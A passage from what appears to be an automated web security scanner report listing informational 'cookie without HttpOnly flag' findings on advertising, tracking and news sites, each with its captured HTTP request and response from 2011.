Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:57 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:57 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

14.85. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 318
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:36 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:36 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2
...[SNIP]...

14.86. http://engine.cmmeglobal.com/v1/page-view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine.cmmeglobal.com
Path:   /v1/page-view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/page-view?acctid=ft&t=1305198189088&tzo=300&pgid=EEBE6C0A-E683-4F1C-A7BB-5D56FDDB3EE8&nplg=9&hstl=1&scrh=1200&scrw=1920&scrd=16 HTTP/1.1
Host: engine.cmmeglobal.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t=version!2|id!6da05d50dbb5512fb25ecc09aa925f2e|time_stamp!1304367647753|sv!eba806786ff9ab6d4fc54816a6e60cfa|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache,must-revalidate
Expires: -1
Pragma: public
P3P: policyref="/w3c/p3p.xml",CP="NON DSP LAW CUR DEV TAI PSA IVA OUR BUS UNI"
Set-Cookie: s=7ccc61886178d12fe3dffbb8492bd50c; Expires=Thu, 12-May-2011 11:33:17 GMT; Path=/
Set-Cookie: t=version!2|id!6da05d50dbb5512fb25ecc09aa925f2e|time_stamp!1304367647753|sv!eba806786ff9ab6d4fc54816a6e60cfa|; Expires=Sat, 20-Aug-2011 11:03:17 GMT; Path=/
Content-Type: text/plain;charset=UTF-8
Content-Length: 0
Date: Thu, 12 May 2011 11:03:17 GMT


14.87. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6x0063o010k03505; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; acs=014020a0g0h1lkaebsxzt1sl6xxzt1sl6xxzt1p28s; rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2zip000000013o01; sglst=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl750073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=Ad-QCIPSuQEQi4DI6wM&amp;guid=ON&amp;script=0
Content-Length: 0
Date: Thu, 12 May 2011 11:49:45 GMT


14.88. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K05539 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=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; rtc_TX1Q=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
If-Modified-Since: Wed, 27 Apr 2011 19:54:40 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:11 GMT; Path=/
Last-Modified: Thu, 12 May 2011 11:37:11 GMT
Cache-Control: max-age=3600, private
Expires: Thu, 12 May 2011 12:37:11 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:10 GMT
Content-Length: 5707

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'K05539';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

14.89. http://lfov.net/webrecorder/g/chimera.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=6839ce2a-0bad-40a6-a65f-c621a7d51f1a; Expires=Fri, 11-May-2012 12:10:11 GMT
Content-Length: 51
Date: Thu, 12 May 2011 12:10:11 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='6839ce2a-0bad-40a6-a65f-c621a7d51f1a';


14.90. http://lfov.net/webrecorder/js/listen.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Thu, 21 Apr 2011 03:32:43 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Thu, 19 May 2011 08:10:09 GMT
Date: Thu, 12 May 2011 12:10:09 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...

14.91. http://lfov.net/webrecorder/w

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/w

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/w?cid=LF_9a6c9f10&vid=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1&from=&t=Global%20Information%20%26%20Communication%20Technology%20Services%20-%20CSS%20Corp&res=1920x1200&cp=http%3A//www.csscorp.com/&0.8998631196799449 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Length: 0
Date: Thu, 12 May 2011 12:10:13 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


14.92. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketing.csscorp.com
Path:   /acton/bn/1090/visitor.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1090/visitor.gif?ts=1305202212105&ref= HTTP/1.1
Host: marketing.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmb=202015363.1.10.1305202210; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1090=UTCTDDDDDDTVYCAV; Domain=.csscorp.com; Expires=Fri, 11-May-2012 12:10:14 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Thu, 12 May 2011 12:10:13 GMT

GIF89a.............!.......,...........L..;

14.93. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://markets.on.nytimes.com
Path:   /research/modules/dealbook_2010/dealbook.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/modules/dealbook_2010/dealbook.asp?18 HTTP/1.1
Host: markets.on.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:03:51 GMT
Content-Length: 12169
Content-Type: text/html
Expires: Thu, 12 May 2011 11:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1977%5F0=A65E7F62E7765BC47864BFFE807574BD; path=/


try { // cache bg imgs in IE
   document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
var currentRegion = 'TopMovers';
function changeRegion(region){
   document.getElementById
...[SNIP]...

14.94. http://meter-svc.nytimes.com/meter.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meter-svc.nytimes.com
Path:   /meter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meter.js?url=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&referer=&callback=c1305198171060 HTTP/1.1
Host: meter-svc.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com
Content-Length: 114
Connection: keep-alive

c1305198171060({"hitPaywall":false,"counted":false,"loggedIn":false,"hash":"D30DFD30595EF4324E4B50EE62114094"});

14.95. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.foxnews.com
Path:   /b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:38:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5E362850118AA-4000010460000E60[CE]; Expires=Tue, 10 May 2016 11:38:45 GMT; Domain=.foxnews.com; Path=/
Location: http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&pccr=true&vidn=26E5E362850118AA-4000010460000E60&&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3